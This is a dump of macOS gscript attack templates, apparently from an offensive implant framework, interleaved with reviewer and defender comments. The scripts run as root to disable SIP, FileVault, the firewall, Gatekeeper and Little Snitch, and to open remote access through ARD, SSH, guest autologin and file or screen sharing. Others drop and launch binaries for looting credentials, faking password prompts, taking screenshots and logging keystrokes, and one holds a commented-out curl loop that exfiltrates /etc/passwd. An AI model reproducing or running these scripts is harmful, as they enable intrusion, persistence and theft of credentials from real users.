3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated attempt to turn off System Integrity Protection by
// running `csrutil disable`. Output and exit code are logged but not
// checked; "Done Disable SIP" prints regardless of the result. Returns
// true in every branch.
// NOTE(review): csrutil normally refuses to change SIP state from a booted
// system (it expects to be run from Recovery), so a non-zero exit here is
// the likely outcome on a stock install — confirm against the target
// macOS version rather than trusting the "Done" line.
function Deploy() {
console.log("starting execution of Disable SIP");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
var response = G.exec.ExecuteCommand("csrutil", ["disable"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Printed unconditionally, regardless of response[3]
console.log("Done Disable SIP");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_filevault.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Filevault
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated attempt to turn off FileVault full-disk encryption by
// running `fdesetup disable`. Output and exit code are logged but not
// checked; "Done Disable Filevault" prints regardless of the result.
// Returns true in every branch.
// NOTE(review): this is a high-impact change on a host where FileVault is
// on — a disable that does succeed starts decrypting the volume. The exit
// code in response[3] is the only signal of whether it took effect.
function Deploy() {
console.log("starting execution of Disable Filevault");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
var response = G.exec.ExecuteCommand("fdesetup", ["disable"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Printed unconditionally, regardless of response[3]
console.log("Done Disable Filevault");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Firewall
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:120
12 | //timeout:150
13 |
// Deploy: root-gated disabling of the macOS application firewall. Sets
// globalstate to 0 in /Library/Preferences/com.apple.alf via `defaults
// write`, then unloads the com.apple.alf.agent launch daemon. Both results
// are logged but not checked; "Done Disable Firewall" prints regardless.
// Returns true in every branch.
// For detection, the two observable events are the `defaults write` to
// com.apple.alf and the `launchctl unload` of the alf agent plist.
function Deploy() {
console.log("starting execution of Disable Firewall");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
// Step 1: flip the firewall's global state preference to off
var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.alf", "globalstate", "-int", "0"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Step 2: unload the firewall agent daemon
var response2 = G.exec.ExecuteCommand("launchctl", ["unload", "/System/Library/LaunchDaemons/com.apple.alf.agent.plist"]);
console.log("Pid: "+response2[0]);
console.log("stdout: "+response2[1]);
console.log("stderr: "+response2[2]);
console.log("exit code: "+response2[3]);
console.log("go errors: "+response2[4]);

// Printed unconditionally, regardless of either exit code
console.log("Done Disable Firewall");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/disable_gatekeeper.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable GateKeeper
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated disabling of Gatekeeper via `spctl --master-disable`.
// Output and exit code are logged but not checked; "Done Disable
// GateKeeper" prints regardless of the result. Returns true in every
// branch.
// For detection, the observable event is the spctl invocation itself; the
// exit code in response[3] is the only signal of whether it took effect.
function Deploy() {
console.log("starting execution of Disable GateKeeper");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
var response = G.exec.ExecuteCommand("spctl", ["--master-disable"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Printed unconditionally, regardless of response[3]
console.log("Done Disable GateKeeper");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_littlesnitch.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable LittleSnitch
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated tampering with a Little Snitch install. Renames the
// "/Library/Little Snitch" directory to "/Library/Little Snitch.backup"
// with `mv`, then runs `killall lsd`. Both results are logged but not
// checked; "Done Disable LittleSnitch" prints regardless. Returns true in
// every branch.
// For detection, the rename of a vendor directory under /Library and a
// killall from an unexpected parent process are the observable events.
function Deploy() {
console.log("starting execution of Disable LittleSnitch");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
// Step 1: move the application directory aside
var response = G.exec.ExecuteCommand("mv", ["/Library/Little Snitch", "/Library/Little Snitch.backup"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Step 2: kill any process named lsd
var response2 = G.exec.ExecuteCommand("killall", ["lsd"]);
console.log("Pid: "+response2[0]);
console.log("stdout: "+response2[1]);
console.log("stderr: "+response2[2]);
console.log("exit code: "+response2[3]);
console.log("go errors: "+response2[4]);
// Printed unconditionally, regardless of either exit code
console.log("Done Disable LittleSnitch");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
38 |
39 |
--------------------------------------------------------------------------------
/attack/os_x/enable_ard.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable apple remote desktop
3 | // Title: enable apple RDP
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
// Deploy: root-gated activation of Apple Remote Desktop via the ARDAgent
// kickstart tool. The flags passed activate and configure the agent,
// allow access for all users with all privileges, and enable the menu
// extra. Output and exit code are logged (the Go error only when non-null)
// but never checked. Returns true in every branch.
// NOTE(review): the closing log line repeats "Enabling apple RDP service";
// it reads as if it was meant to mark completion ("Done ...").
// For detection, a kickstart invocation with -allowAccessFor -allUsers is
// a high-signal event: it grants every local account remote management.
function Deploy() {
console.log("Enabling apple RDP service");

//Ensure running as root: the Username field gates everything below
var curUser = user.Current();
console.log("Our user is: "+curUser[0].Username);
if (curUser[0].Username == "root") {
var execResp = G.exec.ExecuteCommand("/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart", ["-activate", "-configure", "-allowAccessFor", "-allUsers", "-privs", "-all", "-clientopts", "-setmenuextra"]);
console.log("Pid: "+execResp[0]);
console.log("stdout: "+execResp[1])
console.log("stderr: "+execResp[2])
console.log("exit code: "+execResp[3])
if (execResp[4] != null) {
console.log("go errors: "+Dump(execResp[4]))
}
} else {
console.log("Not running as root!");
}

// Printed unconditionally, regardless of the branch taken above
console.log("Enabling apple RDP service");
return true;
}
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_autologin.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Autologin
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated login-window reconfiguration. Two `defaults write`
// calls against /Library/Preferences/com.apple.loginwindow set GuestEnabled
// to YES and autoLoginUser to Guest. Both results are logged but not
// checked; "Done Enable Autologin" prints regardless. Returns true in
// every branch.
// The net effect, if both writes take, is a host that boots straight into
// the Guest account without a password prompt — a high-impact change that
// is worth alerting on from the loginwindow preference writes alone.
function Deploy() {
console.log("starting execution of Enable Autologin");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
// Step 1: enable the Guest account at the login window
var response2 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "GuestEnabled", "-bool", "YES"]);
console.log("Pid: "+response2[0]);
console.log("stdout: "+response2[1]);
console.log("stderr: "+response2[2]);
console.log("exit code: "+response2[3]);
console.log("go errors: "+response2[4]);

// Step 2: make Guest the automatic login user
var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "autoLoginUser", 'Guest']);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Printed unconditionally, regardless of either exit code
console.log("Done Enable Autologin");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_fileshares.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable apple file shares
3 | // Title: enable apple file shares
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
// Deploy: root-gated activation of the Apple File Server by loading its
// launch daemon plist with `launchctl load -w` (the -w flag also clears the
// disabled override so the service persists across reboots). Output and
// exit code are logged but not checked. Returns true in every branch.
// NOTE(review): the closing log line repeats "Enabling apple file shares";
// it reads as if it was meant to mark completion ("Done ...").
// NOTE(review): execResp[4].Errors() is called here while sibling scripts
// use .Error() on Go error values; confirm which method the exec result
// actually exposes, otherwise this branch throws instead of logging.
function Deploy() {
console.log("Enabling apple file shares");

//Ensure running as root: the Username field gates everything below
var curUser = user.Current();
console.log("Our user is: "+curUser[0].Username);
if (curUser[0].Username == "root") {
var execResp = G.exec.ExecuteCommand("launchctl", ["load", "-w", "/System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"]);
console.log("Pid: "+execResp[0]);
console.log("stdout: "+execResp[1])
console.log("stderr: "+execResp[2])
console.log("exit code: "+execResp[3])
if (execResp[4] != null) {
console.log("go errors: "+execResp[4].Errors());
}
} else {
console.log("Not running as root!");
}

// Printed unconditionally, regardless of the branch taken above
console.log("Enabling apple file shares");
return true;
}
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_guest.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Guest
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:120
12 | //timeout:150
13 |
// Deploy: creates and enables the macOS "Guest" account. Runs only when
// user.Current() reports the username "root"; otherwise it logs a message
// and still returns true, so the return value does not distinguish a
// skipped run from a successful one.
// Defender note: every step is a local state change that can be audited --
// a new /Users/Guest directory-services record (dscl), a new
// com.apple.loginwindow.guest-account item in the System keychain, and three
// `defaults write` calls against /Library/Preferences plists.
14 | function Deploy() {
15 | console.log("starting execution of Enable Guest");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
// NOTE(review): the return values of the next 16 commands are discarded, so a
// failing dscl/security step is never logged before the defaults writes below.
20 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest"]);
21 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_defaultLanguage", "en"]);
22 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_guest", "true"]);
23 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_defaultLanguage", "Guest"]);
24 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_LinkedIdentity", "Guest"]);
25 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_UserCertificate", "Guest"]);
26 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "AuthenticationHint", ""]);
27 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "NFSHomeDirectory", "/Users/Guest"]);
28 | G.exec.ExecuteCommand("dscl", [".", "-passwd", "/Users/Guest", ""]);
29 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "Picture", "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/UserIcon.icns"]);
30 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "PrimaryGroupID", "201"]);
31 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "RealName", "Guest User"]);
32 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "RecordName", "Guest"]);
33 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "UniqueID", "201"]);
34 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "UserShell", "/bin/bash"]);
35 | G.exec.ExecuteCommand("security", ["add-generic-password", "-A", "-w", "Guest", "-s", "com.apple.loginwindow.guest-account", "-D", "application password", "/Library/Keychains/System.keychain"]);
// Each ExecuteCommand result below is logged slot by slot; judging by the
// labels it is [pid, stdout, stderr, exit code, go error]. Unlike the other
// scripts on this page, slot 4 is printed directly without a null check.
36 | var response2 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.AppleFileServer", "guestAccess", "-bool", "true"]);
37 | console.log("Pid: "+response2[0]);
38 | console.log("stdout: "+response2[1]);
39 | console.log("stderr: "+response2[2]);
40 | console.log("exit code: "+response2[3]);
41 | console.log("go errors: "+response2[4]);
42 | var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/SystemConfiguration/com.apple.smb.server", "AllowGuestAccess", "-bool", "true"]);
43 | console.log("Pid: "+response[0]);
44 | console.log("stdout: "+response[1]);
45 | console.log("stderr: "+response[2]);
46 | console.log("exit code: "+response[3]);
47 | console.log("go errors: "+response[4]);
48 | var response3 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "GuestEnabled", "-bool", "YES"]);
49 | console.log("Pid: "+response3[0]);
50 | console.log("stdout: "+response3[1]);
51 | console.log("stderr: "+response3[2]);
52 | console.log("exit code: "+response3[3]);
53 | console.log("go errors: "+response3[4]);
54 | 
55 | console.log("Done Enable Guest");
56 | } else {
57 | console.log("Detected a non-root user, this needs to run as root!");
58 | }
// Always true: callers cannot tell from the return value whether anything ran.
59 | return true;
60 | }
61 |
62 |
--------------------------------------------------------------------------------
/attack/os_x/enable_remote_ssh.gs:
--------------------------------------------------------------------------------
1 | // enable remote ssh
2 | // Title: enable remote ssh
3 | // Author: jayhill
4 | // Purpose: To quickly turn on the SSH server and allow incoming SSH connections to the current Mac.
5 | // Gscript version: 1.0.0
6 | // Tactic: Works really well when run w/ sshkey_persistence
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1021
8 |
9 | //priority:130
10 | //timeout:130
11 |
12 | //go_import:os/user as user
13 |
// Deploy: turns on Remote Login (the SSH server) via
// `systemsetup -setremotelogin on`, but only when user.Current() reports
// "root". Always returns true, even when the root check fails.
// Defender note: a `systemsetup -setremotelogin on` invocation spawned by
// a non-interactive parent is a configuration change worth alerting on.
14 | function Deploy() {
15 | console.log("Enabling remoteSSH connection");
16 | 
17 | //Ensure running as root
18 | var curUser = user.Current();
19 | console.log("Our user is: "+curUser[0].Username);
20 | if (curUser[0].Username == "root") {
// execResp is logged as [pid, stdout, stderr, exit code, go error]; only the
// go-error slot is null-checked. Lines 23-25 rely on automatic semicolon
// insertion -- harmless here, but inconsistent with the rest of the file.
21 | var execResp = G.exec.ExecuteCommand("systemsetup", ["-setremotelogin", "on"]);
22 | console.log("Pid: "+execResp[0]);
23 | console.log("stdout: "+execResp[1])
24 | console.log("stderr: "+execResp[2])
25 | console.log("exit code: "+execResp[3])
26 | if (execResp[4] != null) {
27 | console.log("go errors: "+Dump(execResp[4]))
28 | }
29 | } else {
30 | console.log("Not running as root!");
31 | }
32 | 
33 | console.log("Done enable remoteSSH connection");
34 | return true;
35 | }
--------------------------------------------------------------------------------
/attack/os_x/enable_screensharing.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable screen sharing
3 | // Title: enable apple RDP
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
// Deploy: attempts to enable Screen Sharing by clearing its launchd
// override with `defaults write` and then `launchctl load -w` of the
// com.apple.screensharing.plist daemon. Root-only; always returns true.
// Defender note: both the override plist write and the launchctl load of
// a system LaunchDaemon are auditable events.
15 | function Deploy() {
16 | console.log("Enabling apple RDP service");
17 | 
18 | //Ensure running as root
19 | var curUser = user.Current();
20 | console.log("Our user is: "+curUser[0].Username);
21 | if (curUser[0].Username == "root") {
// NOTE(review): the second argv element below contains a space, so `defaults`
// receives "…overrides.plist com.apple.screensharing" as ONE argument rather
// than a domain path followed by a key -- confirm this is what was intended.
22 | var execResp = G.exec.ExecuteCommand("defaults", ["write", "/var/db/launchd.db/com.apple.launchd/overrides.plist com.apple.screensharing", "Disabled", "-bool", "false"]);
23 | console.log("Pid: "+execResp[0]);
24 | console.log("stdout: "+execResp[1]);
25 | console.log("stderr: "+execResp[2]);
26 | console.log("exit code: "+execResp[3]);
27 | if (execResp[4] != null) {
// NOTE(review): this calls .Errors() on the go-error slot while other scripts
// on this page call .Error(); which method the value actually has is not
// visible from here.
28 | console.log("go errors: "+execResp[4].Errors());
29 | }
30 | var execResp2 = G.exec.ExecuteCommand("launchctl", ["load", "-w", "/System/Library/LaunchDaemons/com.apple.screensharing.plist"]);
31 | console.log("Pid: "+execResp2[0]);
32 | console.log("stdout: "+execResp2[1]);
33 | console.log("stderr: "+execResp2[2]);
34 | console.log("exit code: "+execResp2[3]);
// NOTE(review): copy-paste defect -- this checks execResp (the defaults call)
// instead of execResp2, so a go error from launchctl is never logged.
35 | if (execResp[4] != null) {
36 | console.log("go errors: "+execResp[4].Errors());
37 | }
38 | } else {
39 | console.log("Not running as root!");
40 | }
41 | 
// The closing log message repeats "Enabling" rather than reporting completion.
42 | console.log("Enabling apple RDP service");
43 | return true;
44 | }
45 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/attack/os_x/goredloot_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedLoot
3 | // Author: ahhh
4 | // Purpose: Gathers target keys from the victim and stages (compresses / encrypts) them for exfil
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late priority so it runs toward the end; compresses and encrypts the results to a random outfile
8 | // Uses: GoRedLoot to take search and stage: https://github.com/ahhh/GoRedLoot
9 |
10 | //priority:200
11 | //timeout:200
12 |
13 | //go_import:os/user as user
14 | //go_import:os as os
15 |
16 | //import:/private/tmp/GoRedLoot.macho
17 |
// Deploy: writes the embedded "GoRedLoot.macho" asset to a randomly named
// file under os.TempDir() and launches it asynchronously with the current
// user's home directory as the search root and a second random temp path as
// its output file. Always returns true.
// Defender note: the observable artifacts are a new executable with a short,
// random, all-lowercase name in the temp directory, spawned by the implant
// process, plus a second random temp file it writes to.
18 | function Deploy() {
19 | console.log("Starting GoRedLoot");
20 | // Getting our asset
21 | var lootBin = GetAssetAsBytes("GoRedLoot.macho");
// NOTE(review): an asset error is logged but execution continues, so
// lootBin[0] (possibly empty) is still written and executed below.
22 | if (lootBin[1] != null) {
23 | console.log("errors: "+lootBin[1].Error());
24 | }
25 | 
26 | // Get user home directory
27 | var myUser = user.Current();
28 | console.log(myUser[0]);
29 | var searchDir = myUser[0].HomeDir+"/";
30 | 
31 | // Getting a random name and dropping file
32 | var temppath = os.TempDir();
33 | var naming = G.rand.GetAlphaNumericString(6);
34 | var name = naming.toLowerCase();
35 | name = temppath+"/"+name;
// NOTE(review): the write error is ignored here; other scripts on this page
// capture and log it (e.g. dropErr in launch_agent_persistence.gs).
36 | G.file.WriteFileFromBytes(name, lootBin[0]);
37 | console.log("dropped the GoRedLoot binary here: "+name);
38 | 
39 | // Create random out file
40 | var outfile = G.rand.GetAlphaNumericString(5);
41 | var tempp = os.TempDir();
42 | outfile = tempp+"/"+outfile.toLowerCase();
43 | 
44 | // Executing child proc
// proc[1] is the spawn error; proc[0].Process.Pid is only read when it is null.
45 | var proc = G.exec.ExecuteCommandAsync(name, [searchDir, outfile]);
46 | if (proc[1] != null) {
47 | console.log("errors: "+proc[1].Error());
48 | } else {
49 | console.log("pid: "+proc[0].Process.Pid);
50 | }
51 | 
52 | console.log("Done GoRedLoot");
53 | return true;
54 | }
--------------------------------------------------------------------------------
/attack/os_x/goredprompt_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: GoRedPrompt to take screenshots: https://github.com/ahhh/GoRedPrompt
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 |
14 | //import:/private/tmp/GoRedPrompt.macho
15 |
// Deploy: writes the embedded "GoRedPrompt.macho" asset to a random
// lowercase alpha name under os.TempDir() and launches it asynchronously
// with a second random temp path as its only argument. Always returns true.
// Defender note: same artifact pattern as the other *_example.gs scripts on
// this page -- a short random-named executable in the temp directory started
// by the implant process.
16 | function Deploy() {
17 | console.log("Starting GoRedPrompt");
18 | 
19 | // Getting our asset
20 | var promptBin = GetAssetAsBytes("GoRedPrompt.macho");
// NOTE(review): an asset error is logged but not acted on; promptBin[0] is
// still written and executed below.
21 | if (promptBin[1] != null) {
22 | console.log("errors: "+promptBin[1].Error());
23 | }
24 | 
25 | // Getting a random name and dropping file
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(6);
28 | var name = naming.toLowerCase();
29 | name = temppath+"/"+name;
// The WriteFileFromBytes error return is discarded here.
30 | G.file.WriteFileFromBytes(name, promptBin[0]);
31 | console.log("dropped the goredprompt binary here: "+name);
32 | 
33 | // Create random out file
34 | var outfile = G.rand.GetAlphaNumericString(5);
35 | var tempp = os.TempDir();
36 | outfile = tempp+"/"+outfile.toLowerCase();
37 | 
38 | // Executing child proc
39 | var proc = G.exec.ExecuteCommandAsync(name, [outfile]);
40 | if (proc[1] != null) {
41 | console.log("errors: "+proc[1].Error());
42 | } else {
43 | console.log("pid: "+proc[0].Process.Pid);
44 | }
45 | 
46 | console.log("Done GoRedPrompt");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/os_x/goredspy_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every half hour for the next 24 hours (48 x 1800s)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Uses: GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 |
14 | //import:/private/tmp/GoRedSpy.macho
15 |
// Deploy: writes the embedded "GoRedSpy.macho" asset to a random 4-letter
// lowercase name under os.TempDir(), creates a random 3-letter output
// directory there with /bin/mkdir, and launches the binary asynchronously
// with -outDir/-count 48/-delay 1800s (matching the header's 48 x 1800s).
// Always returns true.
// Defender note: artifacts are a random-named executable and a random-named
// directory in the temp location, created by the implant process.
16 | function Deploy() {
17 | console.log("Starting GoRedSpy");
18 | // Getting our asset
19 | var spyBin = GetAssetAsBytes("GoRedSpy.macho");
// NOTE(review): the asset error is logged but execution continues regardless.
20 | if (spyBin[1] != null) {
21 | console.log("errors: "+spyBin[1].Error());
22 | }
23 | 
24 | // Getting a random name and dropping file
25 | var temppath = os.TempDir();
26 | var naming = G.rand.GetAlphaString(4);
27 | var name = naming.toLowerCase();
28 | name = temppath+"/"+name;
// The write error and the mkdir result below are both discarded.
29 | G.file.WriteFileFromBytes(name, spyBin[0]);
30 | console.log("dropped the goredspy binary here: "+name);
31 | 
32 | // Create random out dir
33 | var tempp = os.TempDir();
34 | var outdir = G.rand.GetAlphaString(3);
35 | outdir = tempp+"/"+outdir.toLowerCase();
36 | G.exec.ExecuteCommand("/bin/mkdir", [outdir]);
37 | 
38 | // Executing child proc
39 | var proc = G.exec.ExecuteCommandAsync(name, ["-outDir", outdir, "-count", "48", "-delay", "1800s"]);
40 | if (proc[1] != null) {
41 | console.log("errors: "+proc[1].Error());
42 | } else {
43 | console.log("pid: "+proc[0].Process.Pid);
44 | }
45 | 
46 | console.log("Done GoRedSpy");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/os_x/grab_clipboard.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Grab Clipboard
3 | // Author: ahhh
4 | // Purpose: Grabs the contents of the clipboard to be written to a file or exfiltrated
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1115
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
// Deploy: runs `pbpaste`, logs its result, and writes whatever came back on
// stdout to a random 5-letter lowercase file under os.TempDir().
// Always returns true.
// Defender note: a pbpaste child process spawned by a non-terminal parent,
// followed by a new random-named temp file, is the observable pattern here.
13 | function Deploy() {
14 | console.log("Starting Clipboard Data");
15 | 
// NOTE(review): [""] passes one empty-string argument to pbpaste rather than
// no arguments; an empty argv array is presumably what was meant.
16 | var response = G.exec.ExecuteCommand("pbpaste", [""]);
17 | console.log("Pid: "+response[0]);
18 | console.log("stdout: "+response[1])
19 | console.log("stderr: "+response[2])
20 | console.log("exit code: "+response[3])
21 | if (response[4] != null) {
22 | console.log("errors: "+response[4].Error());
23 | }
24 | 
25 | // Getting a random file path
26 | var temppath = os.TempDir();
27 | var naming = G.rand.GetAlphaString(5);
28 | naming = naming.toLowerCase();
29 | var fullpath = temppath+"/"+naming;
30 | console.log("file name: "+ fullpath);
31 | // Write file
// response[1] (stdout) is written even when the command reported an error
// above; only the write error itself is checked.
32 | var errors = G.file.WriteFileFromString(fullpath, response[1]);
33 | if (errors != null) {
34 | console.log("errors: "+errors.Error());
35 | }
36 | console.log("Done Clipboard Data");
37 | return true;
38 | }
39 |
--------------------------------------------------------------------------------
/attack/os_x/https_exfiltration.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: HTTPS Exfiltration
3 | // Author: ahhh
4 | // Purpose: read a file, encode it, send json to a webserver
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1048
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.macho
11 |
// Endpoint and source file for the exfiltration. Both are referenced only
// from the commented-out lines inside Deploy, so the live code never reads
// them; "https://example.com/" is a placeholder value.
12 | var url = "https://example.com/";
13 | var target_file = "/etc/passwd";
14 |
// Deploy: currently a no-op -- the transfer logic (lines 19-21) is commented
// out, so the function only prints two log lines and returns true. The
// file-level url/target_file variables and the imported asset are unused.
15 | function Deploy() {
16 | console.log("starting HTTPS Exfiltration");
17 | 
18 | // Ghetto exfil the target
19 | //var target_url = url+"$i";
20 | //var command = "/bin/cat "+target_file+" | xxd -ps -c 16 | while read i; do curl "+target_url+"; done;";
21 | //var response = G.exec.ExecuteCommand("/bin/sh", ["-c", command]);
22 | 
23 | 
24 | console.log("done, HTTPS Exfiltration");
25 | return true;
26 | 
27 | }
--------------------------------------------------------------------------------
/attack/os_x/keylogger_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/keystroke.log
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using: this keylogger https://github.com/caseyscarborough/keylogger
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os
13 | //go_import:os/user as user
14 |
15 | //import:/private/tmp/keylogger.macho
16 |
// Deploy: when running as root, writes the embedded "keylogger.macho" asset
// to a random 4-letter lowercase name under os.TempDir() and launches it
// asynchronously with a second random temp path as its argument.
// Non-root runs only log a message. Always returns true.
